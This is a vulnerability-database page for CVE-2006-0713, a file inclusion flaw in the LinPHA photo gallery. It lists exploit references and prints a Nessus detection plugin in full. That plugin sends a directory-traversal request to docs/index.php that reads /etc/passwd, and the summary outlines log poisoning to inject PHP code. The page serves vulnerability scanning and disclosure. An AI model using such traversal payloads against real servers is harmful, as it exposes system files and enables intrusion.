Vulnerabilities > CVE-2006-0713 - Local File Inclusion and PHP Code Injection vulnerability in LinPHA

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
linpha
nessus
exploit available
NVD
Published: 2006-02-15
Updated: 2018-10-19

Summary

Directory traversal vulnerability in LinPHA 1.0 allows remote attackers to include arbitrary files via .. (dot dot) sequences in the (1) lang parameter in docs/index.php and the language parameter in (2) install/install.php, (3) install/sec_stage_install.php, (4) install/third_stage_install.php, and (5) install/forth_stage_install.php. NOTE: direct static code injection is resultant from this issue, as demonstrated by inserting PHP code into the username, which is inserted into linpha.log, which is accessible from the directory traversal.

Vulnerable Configurations

Part Description Count
Application
Linpha
6

Exploit-Db

  • descriptionLinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    idEDB-ID:27194
    last seen2016-02-03
    modified2006-02-11
    published2006-02-11
    reporterrgod
    sourcehttps://www.exploit-db.com/download/27194/
    titleLinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion
  • descriptionLinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    idEDB-ID:27193
    last seen2016-02-03
    modified2006-02-11
    published2006-02-11
    reporterrgod
    sourcehttps://www.exploit-db.com/download/27193/
    titleLinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion
  • descriptionLinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    idEDB-ID:27195
    last seen2016-02-03
    modified2006-02-11
    published2006-02-11
    reporterrgod
    sourcehttps://www.exploit-db.com/download/27195/
    titleLinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion
  • descriptionLinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion. CVE-2006-0713. Webapps exploit for php platform
    idEDB-ID:27192
    last seen2016-02-03
    modified2006-02-11
    published2006-02-11
    reporterrgod
    sourcehttps://www.exploit-db.com/download/27192/
    titleLinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion

Nessus

NASL familyCGI abuses
NASL idLINPHA_10.NASL
descriptionThe remote host is running LinPHA, a web photo gallery application written in PHP. The installed version of LinPHA suffers from a number of flaws, several of which could allow an unauthenticated attacker to view arbitrary files or to execute arbitrary PHP code on the remote host, subject to the privileges of the web server user id. Note that successful exploitation requires that PHP
last seen2020-06-01
modified2020-06-02
plugin id20892
published2006-02-13
reporterThis script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/20892
titleLinPHA <= 1.0 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20892);
  script_version("1.18");

  script_cve_id("CVE-2006-0713");
  script_bugtraq_id(16592);

  script_name(english:"LinPHA <= 1.0 Multiple Vulnerabilities");
  script_summary(english:"Checks for multiple vulnerabilities in LinPHA <= 1.0");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple flaws." );
 script_set_attribute(attribute:"description", value:
"The remote host is running LinPHA, a web photo gallery application
written in PHP. 

The installed version of LinPHA suffers from a number of flaws,
several of which could allow an unauthenticated attacker to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges of the web server user id. 

Note that successful exploitation requires that PHP's
'magic_quotes_gpc' setting be disabled, that an attacker has the
ability to create / upload / edit files on the remote host, or that
the application's 'user login events log' setting be enabled." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2006/Feb/169" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/424729/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13");
 script_cvs_date("Date: 2018/11/15 20:50:17");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/linpha", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Try to exploit the flaw to read /etc/passwd.
  file = "/../../../../../../../../../../etc/passwd";
  w = http_send_recv3(method:"GET", 
    item:string(
      dir, "/docs/index.php?",
      "lang=", file, "%00"
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but passing
    #     remote URLs might still work.
    egrep(string:res, pattern:"main\(\.\./lang/lang\..+/etc/passwd\\0\.php.+ failed to open stream") ||
    egrep(string:res, pattern:"Failed opening '\.\./lang/lang\..+/etc/passwd\\0\.php' for inclusion")
  ) {
    if (egrep(string:res, pattern:"root:.*:0:[01]:")) 
      contents = res - strstr(res, "<!DOCTYPE HTML PUBLIC");

    if (isnull(contents)) security_warning(port);
    else {
      contents = data_protection::redact_etc_passwd(output:contents);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that\n",
        "Nessus was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_warning(port:port, extra:report);
    }

    exit(0);
  }
}

References